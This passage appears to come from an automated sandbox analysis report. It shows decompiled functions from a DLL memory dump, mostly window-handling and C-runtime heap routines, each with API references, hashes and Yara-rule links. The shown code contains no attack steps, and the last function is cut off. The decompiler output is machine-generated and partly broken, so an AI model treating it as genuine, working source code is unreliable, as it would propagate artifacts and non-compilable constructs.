Instruction ID: b3c5a5e9bae091faa71ba9ab598e5e457c25249b77f0fdf27e25f04f3d33fe44
Opcode Fuzzy Hash: 896440ab69eea206496d200f3a3080d3f363082d1f18ac4021212de0202a864c
Instruction Fuzzy Hash: 2221A0B5D00618AAEB11DBA0DC85EBDB6B8EF492D0F104219F416E30A9EB305E40DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000D952, Relevance: 7.6, APIs: 5, Instructions: 71
windowCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E1000D952(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
				struct tagRECT _v20;
				int _t22;
				struct HWND__* _t23;
				struct HWND__* _t42;
				void* _t43;

				_t43 = __ecx;
				_t22 = IsWindowVisible( *(__ecx + 0x20));
				if(_t22 != 0 || _a12 != _t22 || _a16 != _t22) {
					_t23 = ScrollWindow( *(_t43 + 0x20), _a4, _a8, _a12, _a16);
				} else {
					_push(5);
					_push( *(_t43 + 0x20));
					while(1) {
						_t23 = GetWindow();
						_t42 = _t23;
						if(_t42 == 0) {
							break;
						}
						GetWindowRect(_t42,  &_v20);
						E1000AF3F(_t43,  &_v20);
						SetWindowPos(_t42, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
						_push(2);
						_push(_t42);
					}
				}
				if( *((intOrPtr*)(_t43 + 0x4c)) != 0 && _a12 == 0) {
					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x4c)))) + 0x5c))(_a4, _a8);
				}
				return _t23;
			}

0x1000d95d
0x1000d962
0x1000d96a
0x1000d9d5
0x1000d976
0x1000d97c
0x1000d97e
0x1000d9bc
0x1000d9bc
0x1000d9be
0x1000d9c2
0x00000000
0x00000000
0x1000d988
0x1000d994
0x1000d9b3
0x1000d9b9
0x1000d9bb
0x1000d9bb
0x1000d9c4
0x1000d9df
0x00000000
0x1000d9f4
0x1000d9fb

APIs

IsWindowVisible.USER32(?), ref: 1000D962
GetWindowRect.USER32 ref: 1000D988
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 1000D9B3
GetWindow.USER32(00000005,00000005), ref: 1000D9BC
ScrollWindow.USER32 ref: 1000D9D5

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$RectScrollVisible
String ID:
API String ID: 2639402888-0
Opcode ID: 83edce353c3fd06c951f2e9e35c73c47f07b495ceb8aebf87f98b6ef1226730b
Instruction ID: 54079edc09ba3fa6b687f664b28d2356963167d322d05de425bb261cd49d09e4
Opcode Fuzzy Hash: 83edce353c3fd06c951f2e9e35c73c47f07b495ceb8aebf87f98b6ef1226730b
Instruction Fuzzy Hash: 3D216A3220061AAFEF11DF94DC44EAF77BAFB88790F00852AF945931A4EB719D11DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10014AC8, Relevance: 7.6, APIs: 5, Instructions: 60
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10014AC8(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t24;
				unsigned int _t34;
				void* _t46;

				_t46 = __ecx;
				if(IsWindow( *(__ecx + 0x20)) == 0) {
					 *(_t46 + 0xb0) = _a4;
					 *(_t46 + 0xb4) = _a8;
					 *(_t46 + 0xa8) = _a12;
					_t24 = _a16;
					 *(_t46 + 0xac) = _t24;
					return _t24;
				}
				SendMessageA( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				if( *0x1006c780 >= 0x60000) {
					_t34 = SendMessageA( *(_t46 + 0x20), 0x43a, 0, 0);
					 *(_t46 + 0xb0) = _t34 & 0x0000ffff;
					 *(_t46 + 0xb4) = _t34 >> 0x10;
				}
				return InvalidateRect( *(_t46 + 0x20), 0, 1);
			}

0x10014ace
0x10014adb
0x10014b56
0x10014b5f
0x10014b68
0x10014b6e
0x10014b71
0x00000000
0x10014b71
0x10014afe
0x10014b17
0x10014b23
0x10014b2f
0x10014b37
0x10014b3d
0x10014b3d
0x00000000

APIs

IsWindow.USER32(?), ref: 10014AD3
SendMessageA.USER32(?,00000420,00000000,?), ref: 10014AFE
SendMessageA.USER32(?,0000041F,00000000,?), ref: 10014B17
SendMessageA.USER32(?,0000043A,00000000,00000000), ref: 10014B2F
InvalidateRect.USER32(?,00000000,00000001,?,1001581C,?,?,?,?,00000000,?,?,?,?,?,?), ref: 10014B49

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$InvalidateRectWindow
String ID:
API String ID: 3225880595-0
Opcode ID: 45bb52a043d5529eef9769470f5ab8b58c74f0458e5cfa1809336e8f3a36a907
Instruction ID: a5fb11207bd4cfed74f084c61f2758b333d9cee7700e3529f890282a23fadbed
Opcode Fuzzy Hash: 45bb52a043d5529eef9769470f5ab8b58c74f0458e5cfa1809336e8f3a36a907
Instruction Fuzzy Hash: 801119B1604718AFE7108F29DC84BB7B7E9FB48355F01492AF99AC6161E7B0EC50DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10027012, Relevance: 7.6, APIs: 5, Instructions: 54
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10027012(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr _t27;
				void* _t28;
				int _t29;
				intOrPtr _t30;
				CHAR* _t32;
				intOrPtr _t33;
				signed int _t37;

				_t27 = __edx;
				_t24 = __ecx;
				_t35 = _t37;
				_t9 =  *0x1006d940; // 0xc2bf211
				_v8 = _t9 ^ _t37;
				_t22 = _a4;
				_t32 = _a8;
				_push(_t28);
				_t41 = _t22;
				if(_t22 == 0) {
					L2:
					E1000A5CD(_t22, _t24, _t28, _t32, _t41);
				}
				if(_t32 == 0) {
					goto L2;
				}
				_t29 = lstrlenA(_t32);
				_v264 = 0;
				E10041630(_t29,  &_v263, 0, 0xff);
				if(_t29 > 0x100 || GetWindowTextA(_t22,  &_v264, 0x100) != _t29 || lstrcmpA( &_v264, _t32) != 0) {
					_t16 = SetWindowTextA(_t22, _t32);
				}
				_pop(_t30);
				_pop(_t33);
				_pop(_t23);
				return E1003F29E(_t16, _t23, _v8 ^ _t35, _t27, _t30, _t33);
			}

0x10027012
0x10027012
0x10027015
0x1002701d
0x10027024
0x10027028
0x1002702c
0x1002702f
0x10027030
0x10027032
0x10027034
0x10027034
0x10027034
0x1002703b
0x00000000
0x00000000
0x10027049
0x10027054
0x1002705b
0x1002706a
0x10027093
0x10027093
0x1002709c
0x1002709d
0x100270a0
0x100270a7

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 1002703E
_memset.LIBCMT ref: 1002705B
GetWindowTextA.USER32 ref: 10027075
lstrcmpA.KERNEL32(00000000,?), ref: 10027087
SetWindowTextA.USER32(?,?), ref: 10027093

Part of subcall function 1000A5CD: __CxxThrowException@8.LIBCMT ref: 1000A5E3
Part of subcall function 1000A5CD: __EH_prolog3.LIBCMT ref: 1000A5F0

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: d69010b069a664aa6b8fc7e3028bf7376946d0ead98dfc6edd0693997e4316b6
Instruction ID: 9fe6ba2197cbe5618b13ed957d08c4b105b1d20db54c0fba0327abbd9122bb23
Opcode Fuzzy Hash: d69010b069a664aa6b8fc7e3028bf7376946d0ead98dfc6edd0693997e4316b6
Instruction Fuzzy Hash: 8F0184B6601224EBD711DB64ACC4FDB77ACFB58790F410065FA4AD7141DB749E8887A0

Uniqueness

Uniqueness Score: -1.00%

Function 10047CA7, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E10047CA7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x10068c18);
				E10041DB8(__ebx, __edi, __esi);
				_t31 = E100473F1(__ebx, __edx, __edi, _t35);
				_t15 =  *0x1006e20c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E10046515(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x1006e110; // 0x11c1600
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x1006dce8;
								if(__eflags != 0) {
									_push(_t33);
									E1003F6C3(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x1006e110; // 0x11c1600
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x1006e110; // 0x11c1600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E10047D42();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E10042754(_t29, _t31, 0x20);
				}
				return E10041DFD(_t33);
			}

0x10047ca7
0x10047ca7
0x10047ca7
0x10047ca7
0x10047ca9
0x10047cae
0x10047cb8
0x10047cba
0x10047cc2
0x10047ce3
0x10047ce9
0x10047ced
0x10047cf0
0x10047cf3
0x10047cf9
0x10047cfb
0x10047cfd
0x10047d00
0x10047d06
0x10047d08
0x10047d0a
0x10047d10
0x10047d12
0x10047d13
0x10047d18
0x10047d10
0x10047d08
0x10047d19
0x10047d1e
0x10047d21
0x10047d27
0x10047d2b
0x10047d2b
0x10047d31
0x10047d38
0x10047cca
0x10047cca
0x10047cca
0x10047ccf
0x10047cd3
0x10047cd8
0x10047ce0

APIs

__getptd.LIBCMT ref: 10047CB3

Part of subcall function 100473F1: __getptd_noexit.LIBCMT ref: 100473F4
Part of subcall function 100473F1: __amsg_exit.LIBCMT ref: 10047401

__amsg_exit.LIBCMT ref: 10047CD3
__lock.LIBCMT ref: 10047CE3
InterlockedDecrement.KERNEL32(?), ref: 10047D00
InterlockedIncrement.KERNEL32(011C1600), ref: 10047D2B

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: d79ee93738438fc862ea6e2ca400685c52459049f0463b6016fe2cf971f917f3
Instruction ID: ac2eed2efa14606b16e54c58f1d577ec9f1a9a19410b060c4607ece5fb6677d9
Opcode Fuzzy Hash: d79ee93738438fc862ea6e2ca400685c52459049f0463b6016fe2cf971f917f3
Instruction Fuzzy Hash: 2E018079D01B629BD741DB24888679D73A0FF04760F310539E819EB291C7347D51DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 1003F6C3, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E1003F6C3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x10068a08);
				_t8 = E10041DB8(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10041DFD(_t8);
				}
				if( *0x10096378 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x100949e0, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1004223E(_t31);
						 *_t10 = E100421FC(GetLastError());
					}
					goto L9;
				}
				E10046515(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E10046548(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E10046578();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1003F719();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x1003f6c3
0x1003f6c5
0x1003f6ca
0x1003f6cf
0x1003f6d4
0x1003f74b
0x1003f750
0x1003f750
0x1003f6dd
0x1003f722
0x1003f723
0x1003f72b
0x1003f731
0x1003f733
0x1003f735
0x1003f748
0x1003f74a
0x00000000
0x1003f733
0x1003f6e1
0x1003f6e7
0x1003f6ec
0x1003f6f2
0x1003f6f7
0x1003f6f9
0x1003f6fa
0x1003f6fb
0x1003f701
0x1003f702
0x1003f709
0x1003f712
0x00000000
0x1003f714
0x1003f714
0x00000000
0x1003f714

APIs

__lock.LIBCMT ref: 1003F6E1

Part of subcall function 10046515: __mtinitlocknum.LIBCMT ref: 1004652B
Part of subcall function 10046515: __amsg_exit.LIBCMT ref: 10046537
Part of subcall function 10046515: EnterCriticalSection.KERNEL32(00000000,00000000,?,1004749C,0000000D,10068BF0,00000008,10047593,00000000,?,1003FE7F,00000000,?,?,?,1003FEE2), ref: 1004653F

___sbh_find_block.LIBCMT ref: 1003F6EC
___sbh_free_block.LIBCMT ref: 1003F6FB
HeapFree.KERNEL32(00000000,00000000,10068A08,0000000C,100473E2,00000000,?,10047746,00000000,00000001,00000000,?,1004649F,00000018,10068B88,0000000C), ref: 1003F72B
GetLastError.KERNEL32(?,10047746,00000000,00000001,00000000,?,1004649F,00000018,10068B88,0000000C,10046530,00000000,00000000,?,1004749C,0000000D), ref: 1003F73C

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: e5bf8408c9b6b9d276d04fa4cc81b4a813643c7128e97e1fa3fa76b8121f996b
Instruction ID: fb1bf43124213fdc3dc47e31edfb1a789d68b5e1e060f12e6bd176c7bc64062e
Opcode Fuzzy Hash: e5bf8408c9b6b9d276d04fa4cc81b4a813643c7128e97e1fa3fa76b8121f996b
Instruction Fuzzy Hash: 1501D675908316AEEB11DBB19C4ABAE3AA4EF043A5F61412DF440EA191DB34AA40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 1001583B, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E1001583B(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t185;
				signed char _t187;
				intOrPtr* _t189;
				signed char _t193;
				signed int _t196;
				intOrPtr* _t210;
				intOrPtr _t213;
				intOrPtr* _t214;
				signed int _t224;
				signed int _t231;
				intOrPtr* _t233;
				void* _t244;
				signed int _t258;
				signed int _t264;
				signed int _t273;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t281;
				intOrPtr _t282;
				intOrPtr* _t286;
				void* _t290;
				signed int _t291;
				intOrPtr* _t293;

				_t281 = _a4;
				_push(0);
				_t233 = __ecx;
				_push(0);
				_push(0x418);
				_v8 = 0;
				 *_t281 = 0;
				 *((intOrPtr*)(_t281 + 4)) = 0;
				 *((intOrPtr*)( *__ecx + 0x118))();
				_v16 = 0;
				if(0 != 0) {
					_t276 = 0x14;
					_t277 = 0 * _t276 >> 0x20;
					_t185 = E100092FB(0,  ~0x00BADBAD | 0 * _t276);
					_t290 = 0;
					_v8 = _t185;
					if(_v16 > 0) {
						_t282 = _t185;
						do {
							E10014542(_t233, _t290, _t282);
							_t290 = _t290 + 1;
							_t282 = _t282 + 0x14;
						} while (_t290 < _v16);
						_t291 = _v16;
						_t281 = _a4;
						_t244 = 0;
						if(_t291 > 0) {
							_t187 =  *(_t233 + 0x84);
							if((_t187 & 0x00000002) == 0) {
								_t277 = _t187 & 0x00000004;
								if((_t187 & 0x00000004) == 0) {
									L20:
									asm("sbb eax, eax");
									_push(_t244);
									_t224 =  ~(_a8 & 2) & 0x00007fff;
									__eflags = _t224;
									_push(_t224);
								} else {
									if((_a8 & 0x00000004) == 0) {
										__eflags = _a8 & 0x00000008;
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t187 & 0x00000001;
													if((_t187 & 0x00000001) != 0) {
														goto L8;
													} else {
														goto L20;
													}
												} else {
													SetRectEmpty( &_v48);
													 *((intOrPtr*)( *_t233 + 0x148))( &_v48, _a8 & 0x00000002);
													_t231 = _a8 & 0x00000020;
													__eflags = _t231;
													if(_t231 == 0) {
														_t273 = _v48.right - _v48.left;
														__eflags = _t273;
													} else {
														_t273 = _v48.bottom - _v48.top;
													}
													_push(_t231);
													_t244 = _t273 + _a12;
													goto L13;
												}
											} else {
												_push(0);
												L13:
												_push(_t244);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									} else {
										L8:
										_push(_t244);
										_push( *((intOrPtr*)(_t233 + 0x70)));
									}
								}
								_push(_t291);
								_push(_v8);
								E10014F06(_t233, _t277);
							}
							_t189 = E10014DD4(_t233,  &(_v48.right), _v8, _t291);
							 *_t281 =  *_t189;
							 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t189 + 4));
							if((_a8 & 0x00000040) != 0) {
								_v24 = 0;
								_a12 = 0;
								_v48.bottom =  *((intOrPtr*)(_t233 + 0xa4));
								 *((intOrPtr*)(_t233 + 0xa4)) = 0;
								if(_t291 > 0) {
									_t210 = _v8 + 4;
									_v28 = _t210;
									_t258 = _t291;
									do {
										if(( *(_t210 + 5) & 0x00000001) != 0 &&  *_t210 != 0) {
											_a12 = _a12 + 1;
										}
										_t210 = _t210 + 0x14;
										_t258 = _t258 - 1;
									} while (_t258 != 0);
									_t314 = _a12 - _t258;
									if(_a12 > _t258) {
										_t278 = 0x18;
										_t213 = E100092FB(_t314,  ~(_t258 & 0xffffff00 | _t314 > 0x00000000) | _a12 * _t278);
										_t73 = _t213 + 8; // 0x8
										_t286 = _t73;
										_v24 = _t213;
										_t214 = _v28;
										_v32 = _a12;
										_t264 = 0;
										_a12 = 0;
										_v12 = 0;
										_v20 = _t286;
										_v28 = _t214;
										while(1) {
											_t277 = _v32;
											if(_a12 >= _v32) {
												break;
											}
											if(( *(_t214 + 5) & 0x00000001) != 0 &&  *_t214 != 0) {
												 *((intOrPtr*)(_t286 - 8)) = _t264;
												_t277 =  &_v64;
												 *((intOrPtr*)(_t286 - 4)) =  *_t214;
												 *((intOrPtr*)( *_t233 + 0x184))(_t264,  &_v64);
												E1000AF80(_t233,  &_v64);
												_a12 = _a12 + 1;
												_v20 = _v20 + 0x18;
												_t264 = _v12;
												_t214 = _v28;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t286 = _v20;
											}
											_t264 = _t264 + 1;
											_t214 = _t214 + 0x14;
											_v12 = _t264;
											_v28 = _t214;
											if(_t264 < _v16) {
												continue;
											}
											break;
										}
										_t291 = _v16;
										_t281 = _a4;
									}
								}
								_t193 =  *(_t233 + 0x84);
								if((_t193 & 0x00000001) != 0 && (_t193 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t233 + 0x70)) =  *_t281;
								}
								_v12 = _v12 & 0x00000000;
								_t323 = _t291;
								if(_t291 > 0) {
									_v20 = _v8;
									do {
										E10014BCF(_t233, _t277, _t323, _v12, _v20);
										_v12 = _v12 + 1;
										_v20 = _v20 + 0x14;
									} while (_v12 < _t291);
								}
								if(_a12 > 0) {
									_t293 = _v24 + 8;
									_v20 = _t293;
									do {
										_t196 = E100120DF(_t233,  *((intOrPtr*)(_t293 - 4)));
										_v32 = _t196;
										if(_t196 != 0) {
											GetWindowRect( *(_t196 + 0x20),  &_v64);
											 *((intOrPtr*)( *_t233 + 0x184))( *((intOrPtr*)(_v20 - 8)),  &_v64);
											E1001254C(_v32, 0, _v64.left -  *_t293 + _v64.left, _v64.top -  *((intOrPtr*)(_t293 + 4)) + _v64.top, 0, 0, 0x15);
											_t293 = _v20;
											_t281 = _a4;
										}
										_t293 = _t293 + 0x18;
										_t142 =  &_a12;
										 *_t142 = _a12 - 1;
										_t329 =  *_t142;
										_v20 = _t293;
									} while ( *_t142 != 0);
									E1000932A(_t233, _t281, _t293, _t329, _v24);
								}
								 *((intOrPtr*)(_t233 + 0xa4)) = _v48.bottom;
							}
							E1000932A(_t233, _t281, _t291, _t329, _v8);
						}
					}
				}
				SetRectEmpty( &_v64);
				 *((intOrPtr*)( *_t233 + 0x148))( &_v64, _a8 & 0x00000002);
				 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t281 + 4)) + _v64.top - _v64.bottom;
				 *_t281 =  *_t281 + _v64.left - _v64.right;
				E100132BA( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t181 =  *_t281;
				if(_t181 <= _v48.right) {
					_t181 = _v48.right;
				}
				 *_t281 = _t181;
				_t182 =  *((intOrPtr*)(_t281 + 4));
				if(_t182 <= _v48.bottom) {
					_t182 = _v48.bottom;
				}
				 *((intOrPtr*)(_t281 + 4)) = _t182;
				return _t281;
			}

0x10015848
0x1001584b
0x1001584c
0x10015850
0x10015851
0x10015856
0x10015859
0x1001585b
0x1001585e
0x10015868
0x1001586d
0x10015875
0x10015876
0x10015880
0x10015885
0x1001588b
0x1001588e
0x10015894
0x10015896
0x1001589a
0x1001589f
0x100158a0
0x100158a3
0x100158a8
0x100158ab
0x100158ae
0x100158b2
0x100158b8
0x100158c0
0x100158c8
0x100158cb
0x10015938
0x10015942
0x10015944
0x10015945
0x10015945
0x1001594a
0x100158cd
0x100158d1
0x100158d9
0x100158dd
0x100158e7
0x100158eb
0x100158f1
0x100158f5
0x10015934
0x10015936
0x00000000
0x00000000
0x00000000
0x00000000
0x100158f7
0x100158fb
0x10015910
0x10015919
0x10015919
0x1001591c
0x10015929
0x10015929
0x1001591e
0x10015921
0x10015921
0x1001592c
0x10015930
0x00000000
0x10015930
0x100158ed
0x100158ed
0x100158ee
0x100158ee
0x100158ee
0x100158df
0x100158df
0x100158e0
0x100158e0
0x100158d3
0x100158d3
0x100158d3
0x100158d4
0x100158d4
0x100158d1
0x1001594b
0x1001594c
0x10015951
0x10015951
0x10015960
0x1001596e
0x10015970
0x10015973
0x10015983
0x10015986
0x10015989
0x1001598c
0x10015992
0x1001599b
0x1001599e
0x100159a1
0x100159a3
0x100159a7
0x100159ae
0x100159ae
0x100159b1
0x100159b4
0x100159b4
0x100159b7
0x100159ba
0x100159c5
0x100159d0
0x100159d9
0x100159d9
0x100159dc
0x100159df
0x100159e2
0x100159e5
0x100159e7
0x100159ea
0x100159ed
0x100159f0
0x100159f3
0x100159f3
0x100159f9
0x00000000
0x00000000
0x100159ff
0x10015a06
0x10015a0b
0x10015a0f
0x10015a17
0x10015a23
0x10015a28
0x10015a2b
0x10015a2f
0x10015a32
0x10015a38
0x10015a39
0x10015a3a
0x10015a3b
0x10015a3c
0x10015a3c
0x10015a3f
0x10015a40
0x10015a46
0x10015a49
0x10015a4c
0x00000000
0x00000000
0x00000000
0x10015a4c
0x10015a4e
0x10015a51
0x10015a51
0x100159ba
0x10015a54
0x10015a5c
0x10015a64
0x10015a64
0x10015a67
0x10015a6b
0x10015a6d
0x10015a72
0x10015a75
0x10015a7d
0x10015a82
0x10015a85
0x10015a89
0x10015a75
0x10015a92
0x10015a9e
0x10015aa1
0x10015aa7
0x10015aac
0x10015ab1
0x10015ab6
0x10015abf
0x10015ae2
0x10015afe
0x10015b03
0x10015b06
0x10015b06
0x10015b09
0x10015b0c
0x10015b0c
0x10015b0c
0x10015b0f
0x10015b0f
0x10015b17
0x10015b1c
0x10015b20
0x10015b20
0x10015b29
0x10015b2e
0x100158b2
0x1001588e
0x10015b33
0x10015b48
0x10015b55
0x10015b60
0x10015b6d
0x10015b72
0x10015b77
0x10015b79
0x10015b79
0x10015b7c
0x10015b7e
0x10015b84
0x10015b86
0x10015b86
0x10015b89
0x10015b92

APIs

SetRectEmpty.USER32(?), ref: 10015B33

Part of subcall function 100092FB: _malloc.LIBCMT ref: 10009319

GetWindowRect.USER32 ref: 10015ABF

Strings

@, xrefs: 10015965

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$EmptyWindow_malloc
String ID: @
API String ID: 299164714-2766056989
Opcode ID: 1778766eab86ee06f2b85cf7537d477cf0d4a9026502f77d56e9c370d61fa549
Instruction ID: 97a3df44d807849374dca496c37260eadc6c1a59916a674d41be99a76da7c717
Opcode Fuzzy Hash: 1778766eab86ee06f2b85cf7537d477cf0d4a9026502f77d56e9c370d61fa549
Instruction Fuzzy Hash: F1C10871A0021AEFCF04CFA8C985AAEBBF5FF48355F158169E815AF251DB35E980CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013C84, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E10013C84(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a12) {
				intOrPtr _v8;
				struct tagRECT _v24;
				signed int _v28;
				long _v32;
				intOrPtr _v36;
				char _v40;
				signed int _v44;
